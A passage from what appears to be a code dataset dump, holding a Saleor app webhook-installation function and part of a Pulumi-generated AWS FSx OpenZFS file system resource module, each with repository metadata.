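# a guild at most once every 4 hours; e.g. a guild last updated 3 hours ago gives
# total_seconds() == 10800 < 4 * 3600 == 14400, so the swgoh.help call is skipped.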
| 27.285714
| 70
| 0.704188
| 170
| 0.222513
| 0
| 0
| 0
| 0
| 0
| 0
| 51
| 0.066754
|
8bc3ea498abafb408b2345871e2adf30ac6a71a4
| 1,907
|
py
|
Python
|
src/saleor_app/install.py
|
przlada/saleor-app-framework-python
|
3a561c93bf586b4210e7b3c4d2db3408046a9599
|
[
"BSD-3-Clause"
] | 20
|
2021-05-18T18:05:25.000Z
|
2022-03-02T00:39:15.000Z
|
src/saleor_app/install.py
|
przlada/saleor-app-framework-python
|
3a561c93bf586b4210e7b3c4d2db3408046a9599
|
[
"BSD-3-Clause"
] | 13
|
2021-10-19T19:05:24.000Z
|
2022-03-22T13:17:55.000Z
|
src/saleor_app/install.py
|
przlada/saleor-app-framework-python
|
3a561c93bf586b4210e7b3c4d2db3408046a9599
|
[
"BSD-3-Clause"
] | 11
|
2021-06-09T21:24:56.000Z
|
2022-03-12T17:33:30.000Z
|
import logging
import secrets
import string
from typing import Awaitable, Callable, List
from saleor_app.conf import get_settings
from saleor_app.errors import InstallAppError
from saleor_app.graphql import GraphQLError, get_executor, get_saleor_api_url
from saleor_app.mutations import CREATE_WEBHOOK
from saleor_app.schemas.core import AppToken, DomainName, Url, WebhookData
logger = logging.getLogger(__name__)
async def install_app(
domain: DomainName,
token: AppToken,
events: List[str],
target_url: Url,
save_app_data: Callable[[DomainName, WebhookData], Awaitable],
):
alphabet = string.ascii_letters + string.digits
secret_key = "".join(secrets.choice(alphabet) for _ in range(20))
api_url = get_saleor_api_url(domain)
executor = get_executor(host=api_url, auth_token=token)
settings = get_settings()
response, errors = await executor(
CREATE_WEBHOOK,
variables={
"input": {
"targetUrl": target_url,
"events": [event.upper() for event in events],
"name": settings.app_name,
"secretKey": secret_key,
}
},
)
if errors:
logger.warning("Webhook create mutation raised an error")
raise GraphQLError("Webhook create mutation raised an error")
webhook_error = response["data"]["webhookCreate"].get("errors")
if webhook_error:
logger.warning(
"Unable to finish installation of app for %s. Received error: %s",
domain,
webhook_error,
)
        raise InstallAppError("Failed to create webhook for {}.".format(domain))
saleor_webhook_id = response["data"]["webhookCreate"]["webhook"]["id"]
install_app_data = WebhookData(
token=token, webhook_id=saleor_webhook_id, webhook_secret_key=secret_key
)
await save_app_data(domain, install_app_data)
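# Hedged usage sketch (editor addition): wiring `install_app` into an install
# handler; the persistence callback and event list are assumptions, not part of
# the original module.
#     async def save_app_data(domain: DomainName, data: WebhookData):
#         await app_store.put(domain, data.dict())  # hypothetical storage backend
#
#     await install_app(
#         domain="example.saleor.cloud",
#         token="app-token",
#         events=["order_created"],
#         target_url="https://my-app.example.com/api/webhooks",
#         save_app_data=save_app_data,
#     )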
| 31.783333
| 80
| 0.678553
| 0
| 0
| 0
| 0
| 0
| 0
| 1,488
| 0.780283
| 289
| 0.151547
|
8bc41c33e45aca9a963dba5e594b74e5dcb92d03
| 64,465
|
py
|
Python
|
sdk/python/pulumi_aws/fsx/open_zfs_file_system.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/fsx/open_zfs_file_system.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/fsx/open_zfs_file_system.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['OpenZfsFileSystemArgs', 'OpenZfsFileSystem']
@pulumi.input_type
class OpenZfsFileSystemArgs:
def __init__(__self__, *,
deployment_type: pulumi.Input[str],
subnet_ids: pulumi.Input[str],
throughput_capacity: pulumi.Input[int],
automatic_backup_retention_days: Optional[pulumi.Input[int]] = None,
backup_id: Optional[pulumi.Input[str]] = None,
copy_tags_to_backups: Optional[pulumi.Input[bool]] = None,
copy_tags_to_volumes: Optional[pulumi.Input[bool]] = None,
daily_automatic_backup_start_time: Optional[pulumi.Input[str]] = None,
disk_iops_configuration: Optional[pulumi.Input['OpenZfsFileSystemDiskIopsConfigurationArgs']] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
root_volume_configuration: Optional[pulumi.Input['OpenZfsFileSystemRootVolumeConfigurationArgs']] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
storage_capacity: Optional[pulumi.Input[int]] = None,
storage_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
weekly_maintenance_start_time: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a OpenZfsFileSystem resource.
:param pulumi.Input[str] deployment_type: - The filesystem deployment type. Only `SINGLE_AZ_1` is supported.
        :param pulumi.Input[str] subnet_ids: A list of IDs for the subnets that the file system will be accessible from. Exactly 1 subnet needs to be provided.
:param pulumi.Input[int] throughput_capacity: Throughput (megabytes per second) of the file system in power of 2 increments. Minimum of `64` and maximum of `4096`.
:param pulumi.Input[int] automatic_backup_retention_days: The number of days to retain automatic backups. Setting this to 0 disables automatic backups. You can retain automatic backups for a maximum of 90 days.
:param pulumi.Input[str] backup_id: The ID of the source backup to create the filesystem from.
:param pulumi.Input[bool] copy_tags_to_backups: A boolean flag indicating whether tags for the file system should be copied to backups. The default value is false.
:param pulumi.Input[bool] copy_tags_to_volumes: A boolean flag indicating whether tags for the file system should be copied to snapshots. The default value is false.
:param pulumi.Input[str] daily_automatic_backup_start_time: A recurring daily time, in the format HH:MM. HH is the zero-padded hour of the day (0-23), and MM is the zero-padded minute of the hour. For example, 05:00 specifies 5 AM daily. Requires `automatic_backup_retention_days` to be set.
:param pulumi.Input['OpenZfsFileSystemDiskIopsConfigurationArgs'] disk_iops_configuration: The SSD IOPS configuration for the Amazon FSx for OpenZFS file system. See Disk Iops Configuration Below.
        :param pulumi.Input[str] kms_key_id: ARN for the KMS Key to encrypt the file system at rest. Defaults to an AWS managed KMS Key.
        :param pulumi.Input['OpenZfsFileSystemRootVolumeConfigurationArgs'] root_volume_configuration: The configuration for the root volume of the file system. All other volumes are children of the root volume. See Root Volume Configuration Below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A list of IDs for the security groups that apply to the specified network interfaces created for file system access. These security groups will apply to all network interfaces.
:param pulumi.Input[int] storage_capacity: The storage capacity (GiB) of the file system. Valid values between `64` and `524288`.
:param pulumi.Input[str] storage_type: The filesystem storage type. Only `SSD` is supported.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the file system. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
:param pulumi.Input[str] weekly_maintenance_start_time: The preferred start time (in `d:HH:MM` format) to perform weekly maintenance, in the UTC time zone.
"""
pulumi.set(__self__, "deployment_type", deployment_type)
pulumi.set(__self__, "subnet_ids", subnet_ids)
pulumi.set(__self__, "throughput_capacity", throughput_capacity)
if automatic_backup_retention_days is not None:
pulumi.set(__self__, "automatic_backup_retention_days", automatic_backup_retention_days)
if backup_id is not None:
pulumi.set(__self__, "backup_id", backup_id)
if copy_tags_to_backups is not None:
pulumi.set(__self__, "copy_tags_to_backups", copy_tags_to_backups)
if copy_tags_to_volumes is not None:
pulumi.set(__self__, "copy_tags_to_volumes", copy_tags_to_volumes)
if daily_automatic_backup_start_time is not None:
pulumi.set(__self__, "daily_automatic_backup_start_time", daily_automatic_backup_start_time)
if disk_iops_configuration is not None:
pulumi.set(__self__, "disk_iops_configuration", disk_iops_configuration)
if kms_key_id is not None:
pulumi.set(__self__, "kms_key_id", kms_key_id)
if root_volume_configuration is not None:
pulumi.set(__self__, "root_volume_configuration", root_volume_configuration)
if security_group_ids is not None:
pulumi.set(__self__, "security_group_ids", security_group_ids)
if storage_capacity is not None:
pulumi.set(__self__, "storage_capacity", storage_capacity)
if storage_type is not None:
pulumi.set(__self__, "storage_type", storage_type)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tags_all is not None:
pulumi.set(__self__, "tags_all", tags_all)
if weekly_maintenance_start_time is not None:
pulumi.set(__self__, "weekly_maintenance_start_time", weekly_maintenance_start_time)
@property
@pulumi.getter(name="deploymentType")
def deployment_type(self) -> pulumi.Input[str]:
"""
- The filesystem deployment type. Only `SINGLE_AZ_1` is supported.
"""
return pulumi.get(self, "deployment_type")
@deployment_type.setter
def deployment_type(self, value: pulumi.Input[str]):
pulumi.set(self, "deployment_type", value)
@property
@pulumi.getter(name="subnetIds")
def subnet_ids(self) -> pulumi.Input[str]:
"""
        A list of IDs for the subnets that the file system will be accessible from. Exactly 1 subnet needs to be provided.
"""
return pulumi.get(self, "subnet_ids")
@subnet_ids.setter
def subnet_ids(self, value: pulumi.Input[str]):
pulumi.set(self, "subnet_ids", value)
@property
@pulumi.getter(name="throughputCapacity")
def throughput_capacity(self) -> pulumi.Input[int]:
"""
Throughput (megabytes per second) of the file system in power of 2 increments. Minimum of `64` and maximum of `4096`.
"""
return pulumi.get(self, "throughput_capacity")
@throughput_capacity.setter
def throughput_capacity(self, value: pulumi.Input[int]):
pulumi.set(self, "throughput_capacity", value)
@property
@pulumi.getter(name="automaticBackupRetentionDays")
def automatic_backup_retention_days(self) -> Optional[pulumi.Input[int]]:
"""
The number of days to retain automatic backups. Setting this to 0 disables automatic backups. You can retain automatic backups for a maximum of 90 days.
"""
return pulumi.get(self, "automatic_backup_retention_days")
@automatic_backup_retention_days.setter
def automatic_backup_retention_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "automatic_backup_retention_days", value)
@property
@pulumi.getter(name="backupId")
def backup_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the source backup to create the filesystem from.
"""
return pulumi.get(self, "backup_id")
@backup_id.setter
def backup_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "backup_id", value)
@property
@pulumi.getter(name="copyTagsToBackups")
def copy_tags_to_backups(self) -> Optional[pulumi.Input[bool]]:
"""
A boolean flag indicating whether tags for the file system should be copied to backups. The default value is false.
"""
return pulumi.get(self, "copy_tags_to_backups")
@copy_tags_to_backups.setter
def copy_tags_to_backups(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "copy_tags_to_backups", value)
@property
@pulumi.getter(name="copyTagsToVolumes")
def copy_tags_to_volumes(self) -> Optional[pulumi.Input[bool]]:
"""
A boolean flag indicating whether tags for the file system should be copied to snapshots. The default value is false.
"""
return pulumi.get(self, "copy_tags_to_volumes")
@copy_tags_to_volumes.setter
def copy_tags_to_volumes(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "copy_tags_to_volumes", value)
@property
@pulumi.getter(name="dailyAutomaticBackupStartTime")
def daily_automatic_backup_start_time(self) -> Optional[pulumi.Input[str]]:
"""
A recurring daily time, in the format HH:MM. HH is the zero-padded hour of the day (0-23), and MM is the zero-padded minute of the hour. For example, 05:00 specifies 5 AM daily. Requires `automatic_backup_retention_days` to be set.
"""
return pulumi.get(self, "daily_automatic_backup_start_time")
@daily_automatic_backup_start_time.setter
def daily_automatic_backup_start_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "daily_automatic_backup_start_time", value)
@property
@pulumi.getter(name="diskIopsConfiguration")
def disk_iops_configuration(self) -> Optional[pulumi.Input['OpenZfsFileSystemDiskIopsConfigurationArgs']]:
"""
The SSD IOPS configuration for the Amazon FSx for OpenZFS file system. See Disk Iops Configuration Below.
"""
return pulumi.get(self, "disk_iops_configuration")
@disk_iops_configuration.setter
def disk_iops_configuration(self, value: Optional[pulumi.Input['OpenZfsFileSystemDiskIopsConfigurationArgs']]):
pulumi.set(self, "disk_iops_configuration", value)
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> Optional[pulumi.Input[str]]:
"""
        ARN for the KMS Key to encrypt the file system at rest. Defaults to an AWS managed KMS Key.
"""
return pulumi.get(self, "kms_key_id")
@kms_key_id.setter
def kms_key_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_id", value)
@property
@pulumi.getter(name="rootVolumeConfiguration")
def root_volume_configuration(self) -> Optional[pulumi.Input['OpenZfsFileSystemRootVolumeConfigurationArgs']]:
"""
        The configuration for the root volume of the file system. All other volumes are children of the root volume. See Root Volume Configuration Below.
"""
return pulumi.get(self, "root_volume_configuration")
@root_volume_configuration.setter
def root_volume_configuration(self, value: Optional[pulumi.Input['OpenZfsFileSystemRootVolumeConfigurationArgs']]):
pulumi.set(self, "root_volume_configuration", value)
@property
@pulumi.getter(name="securityGroupIds")
def security_group_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of IDs for the security groups that apply to the specified network interfaces created for file system access. These security groups will apply to all network interfaces.
"""
return pulumi.get(self, "security_group_ids")
@security_group_ids.setter
def security_group_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "security_group_ids", value)
@property
@pulumi.getter(name="storageCapacity")
def storage_capacity(self) -> Optional[pulumi.Input[int]]:
"""
The storage capacity (GiB) of the file system. Valid values between `64` and `524288`.
"""
return pulumi.get(self, "storage_capacity")
@storage_capacity.setter
def storage_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "storage_capacity", value)
@property
@pulumi.getter(name="storageType")
def storage_type(self) -> Optional[pulumi.Input[str]]:
"""
The filesystem storage type. Only `SSD` is supported.
"""
return pulumi.get(self, "storage_type")
@storage_type.setter
def storage_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "storage_type", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags to assign to the file system. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
"""
return pulumi.get(self, "tags_all")
@tags_all.setter
def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags_all", value)
@property
@pulumi.getter(name="weeklyMaintenanceStartTime")
def weekly_maintenance_start_time(self) -> Optional[pulumi.Input[str]]:
"""
The preferred start time (in `d:HH:MM` format) to perform weekly maintenance, in the UTC time zone.
"""
return pulumi.get(self, "weekly_maintenance_start_time")
@weekly_maintenance_start_time.setter
def weekly_maintenance_start_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "weekly_maintenance_start_time", value)
@pulumi.input_type
class _OpenZfsFileSystemState:
def __init__(__self__, *,
arn: Optional[pulumi.Input[str]] = None,
automatic_backup_retention_days: Optional[pulumi.Input[int]] = None,
backup_id: Optional[pulumi.Input[str]] = None,
copy_tags_to_backups: Optional[pulumi.Input[bool]] = None,
copy_tags_to_volumes: Optional[pulumi.Input[bool]] = None,
daily_automatic_backup_start_time: Optional[pulumi.Input[str]] = None,
deployment_type: Optional[pulumi.Input[str]] = None,
disk_iops_configuration: Optional[pulumi.Input['OpenZfsFileSystemDiskIopsConfigurationArgs']] = None,
dns_name: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
network_interface_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
owner_id: Optional[pulumi.Input[str]] = None,
root_volume_configuration: Optional[pulumi.Input['OpenZfsFileSystemRootVolumeConfigurationArgs']] = None,
root_volume_id: Optional[pulumi.Input[str]] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
storage_capacity: Optional[pulumi.Input[int]] = None,
storage_type: Optional[pulumi.Input[str]] = None,
subnet_ids: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
throughput_capacity: Optional[pulumi.Input[int]] = None,
vpc_id: Optional[pulumi.Input[str]] = None,
weekly_maintenance_start_time: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering OpenZfsFileSystem resources.
:param pulumi.Input[str] arn: Amazon Resource Name of the file system.
:param pulumi.Input[int] automatic_backup_retention_days: The number of days to retain automatic backups. Setting this to 0 disables automatic backups. You can retain automatic backups for a maximum of 90 days.
:param pulumi.Input[str] backup_id: The ID of the source backup to create the filesystem from.
:param pulumi.Input[bool] copy_tags_to_backups: A boolean flag indicating whether tags for the file system should be copied to backups. The default value is false.
:param pulumi.Input[bool] copy_tags_to_volumes: A boolean flag indicating whether tags for the file system should be copied to snapshots. The default value is false.
:param pulumi.Input[str] daily_automatic_backup_start_time: A recurring daily time, in the format HH:MM. HH is the zero-padded hour of the day (0-23), and MM is the zero-padded minute of the hour. For example, 05:00 specifies 5 AM daily. Requires `automatic_backup_retention_days` to be set.
:param pulumi.Input[str] deployment_type: - The filesystem deployment type. Only `SINGLE_AZ_1` is supported.
:param pulumi.Input['OpenZfsFileSystemDiskIopsConfigurationArgs'] disk_iops_configuration: The SSD IOPS configuration for the Amazon FSx for OpenZFS file system. See Disk Iops Configuration Below.
:param pulumi.Input[str] dns_name: DNS name for the file system, e.g., `fs-12345678.fsx.us-west-2.amazonaws.com`
        :param pulumi.Input[str] kms_key_id: ARN for the KMS Key to encrypt the file system at rest. Defaults to an AWS managed KMS Key.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] network_interface_ids: Set of Elastic Network Interface identifiers from which the file system is accessible. The first network interface returned is the primary network interface.
        :param pulumi.Input[str] owner_id: AWS account identifier that created the file system.
        :param pulumi.Input['OpenZfsFileSystemRootVolumeConfigurationArgs'] root_volume_configuration: The configuration for the root volume of the file system. All other volumes are children of the root volume. See Root Volume Configuration Below.
:param pulumi.Input[str] root_volume_id: Identifier of the root volume, e.g., `fsvol-12345678`
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A list of IDs for the security groups that apply to the specified network interfaces created for file system access. These security groups will apply to all network interfaces.
:param pulumi.Input[int] storage_capacity: The storage capacity (GiB) of the file system. Valid values between `64` and `524288`.
:param pulumi.Input[str] storage_type: The filesystem storage type. Only `SSD` is supported.
        :param pulumi.Input[str] subnet_ids: A list of IDs for the subnets that the file system will be accessible from. Exactly 1 subnet needs to be provided.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the file system. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
:param pulumi.Input[int] throughput_capacity: Throughput (megabytes per second) of the file system in power of 2 increments. Minimum of `64` and maximum of `4096`.
:param pulumi.Input[str] vpc_id: Identifier of the Virtual Private Cloud for the file system.
:param pulumi.Input[str] weekly_maintenance_start_time: The preferred start time (in `d:HH:MM` format) to perform weekly maintenance, in the UTC time zone.
"""
if arn is not None:
pulumi.set(__self__, "arn", arn)
if automatic_backup_retention_days is not None:
pulumi.set(__self__, "automatic_backup_retention_days", automatic_backup_retention_days)
if backup_id is not None:
pulumi.set(__self__, "backup_id", backup_id)
if copy_tags_to_backups is not None:
pulumi.set(__self__, "copy_tags_to_backups", copy_tags_to_backups)
if copy_tags_to_volumes is not None:
pulumi.set(__self__, "copy_tags_to_volumes", copy_tags_to_volumes)
if daily_automatic_backup_start_time is not None:
pulumi.set(__self__, "daily_automatic_backup_start_time", daily_automatic_backup_start_time)
if deployment_type is not None:
pulumi.set(__self__, "deployment_type", deployment_type)
if disk_iops_configuration is not None:
pulumi.set(__self__, "disk_iops_configuration", disk_iops_configuration)
if dns_name is not None:
pulumi.set(__self__, "dns_name", dns_name)
if kms_key_id is not None:
pulumi.set(__self__, "kms_key_id", kms_key_id)
if network_interface_ids is not None:
pulumi.set(__self__, "network_interface_ids", network_interface_ids)
if owner_id is not None:
pulumi.set(__self__, "owner_id", owner_id)
if root_volume_configuration is not None:
pulumi.set(__self__, "root_volume_configuration", root_volume_configuration)
if root_volume_id is not None:
pulumi.set(__self__, "root_volume_id", root_volume_id)
if security_group_ids is not None:
pulumi.set(__self__, "security_group_ids", security_group_ids)
if storage_capacity is not None:
pulumi.set(__self__, "storage_capacity", storage_capacity)
if storage_type is not None:
pulumi.set(__self__, "storage_type", storage_type)
if subnet_ids is not None:
pulumi.set(__self__, "subnet_ids", subnet_ids)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tags_all is not None:
pulumi.set(__self__, "tags_all", tags_all)
if throughput_capacity is not None:
pulumi.set(__self__, "throughput_capacity", throughput_capacity)
if vpc_id is not None:
pulumi.set(__self__, "vpc_id", vpc_id)
if weekly_maintenance_start_time is not None:
pulumi.set(__self__, "weekly_maintenance_start_time", weekly_maintenance_start_time)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
Amazon Resource Name of the file system.
"""
return pulumi.get(self, "arn")
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter(name="automaticBackupRetentionDays")
def automatic_backup_retention_days(self) -> Optional[pulumi.Input[int]]:
"""
The number of days to retain automatic backups. Setting this to 0 disables automatic backups. You can retain automatic backups for a maximum of 90 days.
"""
return pulumi.get(self, "automatic_backup_retention_days")
@automatic_backup_retention_days.setter
def automatic_backup_retention_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "automatic_backup_retention_days", value)
@property
@pulumi.getter(name="backupId")
def backup_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the source backup to create the filesystem from.
"""
return pulumi.get(self, "backup_id")
@backup_id.setter
def backup_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "backup_id", value)
@property
@pulumi.getter(name="copyTagsToBackups")
def copy_tags_to_backups(self) -> Optional[pulumi.Input[bool]]:
"""
A boolean flag indicating whether tags for the file system should be copied to backups. The default value is false.
"""
return pulumi.get(self, "copy_tags_to_backups")
@copy_tags_to_backups.setter
def copy_tags_to_backups(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "copy_tags_to_backups", value)
@property
@pulumi.getter(name="copyTagsToVolumes")
def copy_tags_to_volumes(self) -> Optional[pulumi.Input[bool]]:
"""
A boolean flag indicating whether tags for the file system should be copied to snapshots. The default value is false.
"""
return pulumi.get(self, "copy_tags_to_volumes")
@copy_tags_to_volumes.setter
def copy_tags_to_volumes(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "copy_tags_to_volumes", value)
@property
@pulumi.getter(name="dailyAutomaticBackupStartTime")
def daily_automatic_backup_start_time(self) -> Optional[pulumi.Input[str]]:
"""
A recurring daily time, in the format HH:MM. HH is the zero-padded hour of the day (0-23), and MM is the zero-padded minute of the hour. For example, 05:00 specifies 5 AM daily. Requires `automatic_backup_retention_days` to be set.
"""
return pulumi.get(self, "daily_automatic_backup_start_time")
@daily_automatic_backup_start_time.setter
def daily_automatic_backup_start_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "daily_automatic_backup_start_time", value)
@property
@pulumi.getter(name="deploymentType")
def deployment_type(self) -> Optional[pulumi.Input[str]]:
"""
- The filesystem deployment type. Only `SINGLE_AZ_1` is supported.
"""
return pulumi.get(self, "deployment_type")
@deployment_type.setter
def deployment_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deployment_type", value)
@property
@pulumi.getter(name="diskIopsConfiguration")
def disk_iops_configuration(self) -> Optional[pulumi.Input['OpenZfsFileSystemDiskIopsConfigurationArgs']]:
"""
The SSD IOPS configuration for the Amazon FSx for OpenZFS file system. See Disk Iops Configuration Below.
"""
return pulumi.get(self, "disk_iops_configuration")
@disk_iops_configuration.setter
def disk_iops_configuration(self, value: Optional[pulumi.Input['OpenZfsFileSystemDiskIopsConfigurationArgs']]):
pulumi.set(self, "disk_iops_configuration", value)
@property
@pulumi.getter(name="dnsName")
def dns_name(self) -> Optional[pulumi.Input[str]]:
"""
DNS name for the file system, e.g., `fs-12345678.fsx.us-west-2.amazonaws.com`
"""
return pulumi.get(self, "dns_name")
@dns_name.setter
def dns_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "dns_name", value)
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> Optional[pulumi.Input[str]]:
"""
ARN for the KMS Key to encrypt the file system at rest. Defaults to an AWS managed KMS Key.
"""
return pulumi.get(self, "kms_key_id")
@kms_key_id.setter
def kms_key_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_id", value)
@property
@pulumi.getter(name="networkInterfaceIds")
def network_interface_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Set of Elastic Network Interface identifiers from which the file system is accessible. The first network interface returned is the primary network interface.
"""
return pulumi.get(self, "network_interface_ids")
@network_interface_ids.setter
def network_interface_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "network_interface_ids", value)
@property
@pulumi.getter(name="ownerId")
def owner_id(self) -> Optional[pulumi.Input[str]]:
"""
AWS account identifier that created the file system.
"""
return pulumi.get(self, "owner_id")
@owner_id.setter
def owner_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "owner_id", value)
@property
@pulumi.getter(name="rootVolumeConfiguration")
def root_volume_configuration(self) -> Optional[pulumi.Input['OpenZfsFileSystemRootVolumeConfigurationArgs']]:
"""
The configuration for the root volume of the file system. All other volumes are children of the root volume. See Root Volume Configuration below.
"""
return pulumi.get(self, "root_volume_configuration")
@root_volume_configuration.setter
def root_volume_configuration(self, value: Optional[pulumi.Input['OpenZfsFileSystemRootVolumeConfigurationArgs']]):
pulumi.set(self, "root_volume_configuration", value)
@property
@pulumi.getter(name="rootVolumeId")
def root_volume_id(self) -> Optional[pulumi.Input[str]]:
"""
Identifier of the root volume, e.g., `fsvol-12345678`
"""
return pulumi.get(self, "root_volume_id")
@root_volume_id.setter
def root_volume_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "root_volume_id", value)
@property
@pulumi.getter(name="securityGroupIds")
def security_group_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of IDs for the security groups that apply to the specified network interfaces created for file system access. These security groups will apply to all network interfaces.
"""
return pulumi.get(self, "security_group_ids")
@security_group_ids.setter
def security_group_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "security_group_ids", value)
@property
@pulumi.getter(name="storageCapacity")
def storage_capacity(self) -> Optional[pulumi.Input[int]]:
"""
The storage capacity (GiB) of the file system. Valid values are between `64` and `524288`.
"""
return pulumi.get(self, "storage_capacity")
@storage_capacity.setter
def storage_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "storage_capacity", value)
@property
@pulumi.getter(name="storageType")
def storage_type(self) -> Optional[pulumi.Input[str]]:
"""
The filesystem storage type. Only `SSD` is supported.
"""
return pulumi.get(self, "storage_type")
@storage_type.setter
def storage_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "storage_type", value)
@property
@pulumi.getter(name="subnetIds")
def subnet_ids(self) -> Optional[pulumi.Input[str]]:
"""
A list of IDs for the subnets that the file system will be accessible from. Exactly 1 subnet needs to be provided.
"""
return pulumi.get(self, "subnet_ids")
@subnet_ids.setter
def subnet_ids(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_ids", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags to assign to the file system. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
"""
return pulumi.get(self, "tags_all")
@tags_all.setter
def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags_all", value)
@property
